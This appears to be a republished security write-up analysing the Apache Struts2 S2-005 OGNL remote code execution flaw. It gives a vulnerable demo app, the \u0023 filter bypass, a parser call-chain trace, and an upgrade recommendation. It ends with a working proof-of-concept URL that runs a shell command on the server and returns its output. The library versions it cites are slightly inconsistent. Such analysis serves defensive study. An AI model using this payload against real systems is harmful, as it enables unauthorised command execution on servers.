[13621] 2019-01-06_Struts2-005 Remote Code Execution Vulnerability Analysis

Document creator: s7ckTeam
Views: 3
Last updated: 2025-01-18
Struts2-005 (S2-005) vulnerability analysis. Source: FreeBuf, 2019-01-06.

Advisory: https://cwiki.apache.org/confluence/display/WW/S2-005
Summary: XWork ParameterInterceptors bypass allows remote command execution.
Affected: Struts 2.0.0 - Struts 2.1.8.1.
Recommendation: Developers should immediately upgrade to Struts 2.2.1 or read the following solution instructions carefully for a configuration change to mitigate the vulnerability.
Related advisory: S2-003 (affects Struts 2.0.11.2 and earlier); S2-005 is a bypass of the S2-003 fix.

Test environment: Struts 2.1.8.1, downloaded from http://archive.apache.org/dist/struts/binaries/struts-2.1.8.1-all.zip. Libraries placed in the web application:
commons-fileupload-1.2.1.jar
commons-logging-1.0.4.jar
freemarker-2.3.15.jar
ognl-2.7.3.jar
struts2-core-2.1.8.1.jar
xwork-2.0.5.jar
Files of the demo application: index.jsp, welcome.jsp, struts.xml, com.demo.action.LoginAction.java, web.xml.

index.jsp:

```jsp
<%@ page language="java" contentType="text/html; charset=UTF-8"
    pageEncoding="UTF-8"%>
<%@ taglib prefix="s" uri="/struts-tags" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>S2-005</title>
</head>
<body>
<h2>S2-005 Demo</h2>
<p>link: <a href="https://cwiki.apache.org/confluence/display/WW/S2-005">https://cwiki.apache.org/confluence/display/WW/S2-005</a></p>
<s:form action="login">
    <s:textfield name="username" label="username" />
    <s:textfield name="password" label="password" />
    <s:submit></s:submit>
</s:form>
</body>
</html>
```

welcome.jsp:

```jsp
<%@ page language="java" contentType="text/html; charset=UTF-8"
    pageEncoding="UTF-8"%>
<%@ taglib prefix="s" uri="/struts-tags" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>S2-005</title>
</head>
<body>
<p>Hello <s:property value="username"></s:property></p>
</body>
</html>
```

struts.xml:

```xml
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE struts PUBLIC
    "-//Apache Software Foundation//DTD Struts Configuration 2.0//EN"
    "http://struts.apache.org/dtds/struts-2.0.dtd">
<struts>
    <package name="S2-005" extends="struts-default">
        <action name="login" class="com.demo.action.LoginAction">
            <result name="success">welcome.jsp</result>
            <result name="error">index.jsp</result>
        </action>
    </package>
</struts>
```
The application is deployed on Tomcat 6.

com.demo.action.LoginAction.java:

```java
package com.demo.action;

import com.opensymphony.xwork2.ActionSupport;

public class LoginAction extends ActionSupport {
    private String username = null;
    private String password = null;

    public String getUsername() {
        return this.username;
    }

    public String getPassword() {
        return this.password;
    }

    public void setUsername(String username) {
        this.username = username;
    }

    public void setPassword(String password) {
        this.password = password;
    }

    public String execute() throws Exception {
        // The fields default to null, so check for absent parameters
        // before calling isEmpty() to avoid a NullPointerException.
        if (this.username == null || this.username.isEmpty()
                || this.password == null || this.password.isEmpty()) {
            return "error";
        }
        if ((this.username.equalsIgnoreCase("admin"))
                && (this.password.equals("admin"))) {
            return "success";
        }
        return "error";
    }
}
```

web.xml:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xmlns="http://xmlns.jcp.org/xml/ns/javaee"
    xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_3_1.xsd"
    id="WebApp_ID" version="3.1">
    <display-name>S2-005 Example</display-name>
    <filter>
        <filter-name>struts2</filter-name>
        <filter-class>org.apache.struts2.dispatcher.FilterDispatcher</filter-class>
    </filter>
    <filter-mapping>
        <filter-name>struts2</filter-name>
        <url-pattern>/*</url-pattern>
    </filter-mapping>
    <welcome-file-list>
        <welcome-file>index.jsp</welcome-file>
    </welcome-file-list>
</web-app>
```

Analysis. The S2-003 fix evaluates request parameter names as OGNL only with `xwork.MethodAccessor.denyMethodExecution` set to true and `_memberAccess.allowStaticMethodAccess` set to false in the OGNL context, and rejects parameter names that contain `#`. S2-005 bypasses the `#` check by writing the character as its unicode escape `\u0023`: the OGNL parser decodes the escape back to `#`, so a parameter name can reach `#context` and `#_memberAccess` and flip both flags (denyMethodExecution to false, allowStaticMethodAccess to true), after which method execution in OGNL is allowed again, exactly as in S2-003.

Call chain traced from a request parameter to the OGNL parser:

xwork-core-2.1.16.jar!com/opensymphony/xwork2/interceptor/ParametersInterceptor -> setParameters()
xwork-core-2.1.16.jar!com/opensymphony/xwork2/ognl/OgnlValueStack -> setValue()
xwork-core-2.1.16.jar!com/opensymphony/xwork2/ognl/OgnlUtil -> setValue() -> compile() -> Ognl.parseExpression()
ognl-2.7.3.jar!ognl/OgnlParser -> topLevelExpression() -> expression()

It is in the parser that `\u0023` in the parameter name becomes `#`.
POC request used in the analysis. It disables denyMethodExecution, enables static method access, clears excludeProperties, runs `ifconfig` through java.lang.Runtime and writes the command output into the HTTP response:

```
http://localhost:1111/login.action?(\u0023context[xwork.MethodAccessor.denyMethodExecution]\u003dfalse)(bla)(bla)&(\u0023_memberAccess.allowStaticMethodAccess\u003dtrue)(bla)(bla)&(\u0023_memberAccess.excludeProperties\u003d@java.util.Collections@EMPTY_SET)(kxlzx)(kxlzx)&(\u0023mycmd\u003difconfig)(bla)(bla)&(\u0023myret\u003d@java.lang.Runtime@getRuntime().exec(\u0023mycmd))(bla)(bla)&(A)((\u0023mydat\u003dnew\40java.io.DataInputStream(\u0023myret.getInputStream()))(bla))&(B)((\u0023myres\u003dnew\40byte[51020])(bla))&(C)((\u0023mydat.readFully(\u0023myres))(bla))&(D)((\u0023mystr\u003dnew\40java.lang.String(\u0023myres))(bla))&(\u0023myout\u003d@org.apache.struts2.ServletActionContext@getResponse())(bla)(bla)&(E)((\u0023myout.getWriter().println(\u0023mystr))(bla))
```

References:
https://cwiki.apache.org/confluence/display/WW/S2-005
https://blog.csdn.net/u011721501/article/details/41626959
https://xz.aliyun.com/t/2323